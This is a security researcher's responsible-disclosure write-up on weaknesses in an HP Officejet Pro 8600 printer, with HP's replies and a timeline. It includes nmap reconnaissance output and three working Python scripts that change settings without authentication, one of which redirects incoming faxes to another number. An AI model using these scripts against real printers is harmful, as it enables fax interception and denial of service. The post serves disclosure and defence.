How I hacked a HP Printer

WS201511 – How I hacked a HP Printer
by David Sopas @dsopas
www.websegura.net

Description:

I had the opportunity to test some printers from HPHP Officejet Pro series.
I decided to test it and did a scan on the local IP of this Wi-Fi printer.
Note: I would like to tell that all the installation steps were made using HP manual.

Information disclosure:

I runned nmap on the local IP of the HP printer and had curious results.
In my opinion there are too much information disclosed to any local user connected on the same network.

On port 80/tcp (HTTP) shows us the complete model and respective serial number of the printer:

HP Officejet Pro 8600 printer http config (Serial CN1CTxxxxxxxxxx)

On port 161/udp (SNMP) shows us the MAC address, Ethernet speed and traffic stats:

MAC address: xx:xx:xx:xx:xx:xx (Hewlett-Packard Company)
Type: ethernetCsmacd Speed: 10 Mbps
Status: up
Traffic stats: 1.33 Mb sent, 2.39 Mb received

On SNMP [with netstat] it shows us the established connections to the printer and system uptime:

TCP 192.168.1.89:9110 192.168.1.65:30645
TCP 192.168.1.89:9111 192.168.1.65:70
TCP 192.168.1.89:47485 15.201.141.250:5222
System uptime: 0 days, 5:11:07.91 (1866791 timeticks)

With the Nmap script – smb-os-discovery, a user can also know the OS running on the printer with the “guest” account:

OS: VxWorks (NQ 4.32)

These information should be limited and restricted because it can be used to launch other type of attacks.

HP reported:

The information noted as well as other information is provided by design. For example, by nature printers need to be discoverable so that clients can find them and connect to the right one, and this involves making some information that uniquely identifies the printer available.

HP continues to evaluate and balance the needs between providing important information for end users and limiting access to such information.

Admin panel access and bad password type of encryption:

Another major issue is that the admin panel by default doesn’t have a password which in my opinion is a bad security policy. On first connection to the Admin Panel it should ask the user to submit a password.
Also if you add a new password or change to another one, the password is encrypted in Base64. Not very safe encryption method.

HP reported:

We do not think that a default password adds any security because it will become well known like default router passwords. It would be an inconvenience for novice users who don’t know the default password yet adds no meaningful security.
We support basic authentication over HTTPS.

Spam Printing and Denial of Service:

In my point-of-view, the worst security issue I found was the P9100 active by default (can be also activated without admin access). In the admin panel HP says that this method supports printing by raw IP on port TCP 9100. Also that it’s accessed by HP software – HP Standard Port. What I found next was also using nmap. Three open ports 9100, 9101 and 9102.

If you connect with telnet on one of these ports you can print whatever you type on the terminal. Keep in mind that until you are connected to the print via telnet, it shows “Printing…” in the HP printer panel and keeps the printer busy until you close the telnet session. That prevents other users to use the printer.

The computer that connects to telnet don’t even need to have the printer installed or access to the printer. Only have to have access to the local network.

I already know by searching on Google that many companies have issues on Spam Priting via Internet. Maybe these affected companies aren’t filtering or closing some naughty ports on the printer?

This security issue can be very costly – Spam Printing – to a company because someone can play around spending resources from them – ink and paper. It can even damage the printer if someone write some script that simply sends requests to that port and keeps printing and filling the printer queue.

HP reported:

The design for printing via Windows Standard TCP/IP Port Monitor requires port 9100 to be open by default. Other ports, such as 9101 and 9102 are used for diagnostic and troubleshooting purposes and provide no useful data.

Modify options without permission (admin is protected with a password):

I wrote some Python scripts that allow anyone on the local network to change printer options without password.

Change Power Save Timeout

import http.client
connection =  http.client.HTTPConnection('192.168.1.89:80')
headers = {"Content-type": "Content-Type: text/xml", "Accept": "*/*"}
body_content = '<prdcfgdyn2:ProductConfigDyn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:prdcfgdyn2="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16" xmlns:prdcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16 ../schemas/ledm2/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05 ../schemas/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../schemas/dd/DataDictionaryMasterLEDM.xsd"><prdcfgdyn2:ProductSettings><dd:PowerSaveTimeout>5minutes</dd:PowerSaveTimeout></prdcfgdyn2:ProductSettings></prdcfgdyn2:ProductConfigDyn>'
connection.request('PUT', 'http://192.168.1.89/DevMgmt/ProductConfigDyn.xml', body_content, headers)
result = connection.getresponse()
print(result.status, result.reason)

Redirect FAX to another number

import http.client
connection =  http.client.HTTPConnection('192.168.1.89:80')
headers = {"Content-type": "Content-Type: text/xml", "Accept": "*/*"}
body_content = '<faxcfgdyn:FaxConfigDyn xmlns:faxcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/faxconfigdyn/2009/03/03" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:fax="http://www.hp.com/schemas/imaging/con/fax/2008/06/13" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/faxconfigdyn/2009/03/03 ../schemas/FaxConfigDyn.xsd"><faxcfgdyn:ReceiveSettings><dd:FaxForwardingNumber>111111111</dd:FaxForwardingNumber><fax:ReceiveForward>forward</fax:ReceiveForward><faxcfgdyn:ForwardScheduleSettings><faxcfgdyn:ForwardStartTime><dd:TimeStamp>2015-02-26T00:00:00.0Z</dd:TimeStamp></faxcfgdyn:ForwardStartTime><faxcfgdyn:ForwardStopTime><dd:TimeStamp>2015-02-28T00:00:00.0Z</dd:TimeStamp></faxcfgdyn:ForwardStopTime></faxcfgdyn:ForwardScheduleSettings></faxcfgdyn:ReceiveSettings></faxcfgdyn:FaxConfigDyn>'
connection.request('PUT', 'http://192.168.1.89/DevMgmt/FaxConfigDyn.xml', body_content, headers)
result = connection.getresponse()
print(result.status, result.reason)

Scheduled printer Off

import http.client
connection =  http.client.HTTPConnection('192.168.1.89:80')
headers = {"Content-type": "Content-Type: text/xml", "Accept": "*/*"}
body_content = '<prdcfgdyn2:ProductConfigDyn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:prdcfgdyn2="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16" xmlns:prdcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16 ../schemas/ledm2/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05 ../schemas/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../schemas/dd/DataDictionaryMasterLEDM.xsd"><prdcfgdyn2:ProductSettings><dd:ScheduledOffScheduledOnTime><dd:ScheduledOff><dd:AutoOffTimeSetting>enabled</dd:AutoOffTimeSetting><dd:AutoOffTimeAndDaySetting><dd:AutoOffTimeValue>19:00:00</dd:AutoOffTimeValue><dd:DaysOfWeek>sunday</dd:DaysOfWeek></dd:AutoOffTimeAndDaySetting><dd:Deferred>false</dd:Deferred></dd:ScheduledOff><dd:ScheduledOn><dd:AutoOnTimeSetting>disabled</dd:AutoOnTimeSetting><dd:AutoOnTimeAndDaySetting><dd:AutoOnTimeValue>00:00:00</dd:AutoOnTimeValue></dd:AutoOnTimeAndDaySetting></dd:ScheduledOn></dd:ScheduledOffScheduledOnTime></prdcfgdyn2:ProductSettings></prdcfgdyn2:ProductConfigDyn>'
connection.request('PUT', 'http://192.168.1.89/DevMgmt/ProductConfigDyn.xml', body_content, headers)
result = connection.getresponse()
print(result.status, result.reason)

And a lot more services that you can manage to manipulate this way.

HP reported:

HP enterprise class printers do not allow any persistent setting changes without the admin password, but printers designed for small teams of users (home consumers and small businesses) do allow less critical persistent settings to be changed without requiring the admin password.
HP has remediated some settings at the user level and recognizes the advantage of password protecting additional settings in our proprietary configuration interface. HP continues to investigate additional security for these interfaces.
(Note: a persistent setting is a global setting that persists across power cycles. This is in contrast to job-specific settings which need to be easily changed as part of each user submitted job.)

I didn’t try other HP models so I don’t know if any of them have these kind of issues.

I would like to thank HP for providing their feedback even if they’re are different from my security perspective. It’s always important to establish a communication between security researchers.

Timeline:

20 Feb 2015 – Reported to HP security
20 Feb 2015 – HP assigned a reference number to this advisory
04 Mar 2015 – HP still working on the issue
01 Apr 2015 – HP replied with the feedback I provided during the full disclosure
15 Apr 2015 – Full disclosure

Achaste interessante? Partilha!